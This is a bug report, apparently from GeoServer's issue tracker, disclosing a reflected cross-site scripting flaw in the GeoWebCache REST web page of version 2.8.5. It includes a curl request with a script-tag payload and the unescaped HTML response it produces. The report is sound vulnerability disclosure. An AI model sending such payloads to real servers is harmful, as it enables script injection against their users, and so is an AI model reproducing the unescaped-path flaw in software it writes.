Another XSS vulnerability in GWC

Description

Running

1 curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'

yields an answer with unescaped HTML:

1 2 3 4 5 <html><body> <a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a> <h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer by appending the name of the layer to the URL, DELETE an existing layer or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li> <li><h4>seed</h4></li> </ul></body></html>

Looks like the problem is similar to GEOS-7549.

Environment

Tomcat 7, OpenJDK 1.8.0_102

Status

Assignee

Unassigned

Reporter

Juraj Hrubsa

Triage

None

Fix versions

Affects versions

2.8.5

Components

Priority

Medium
Configure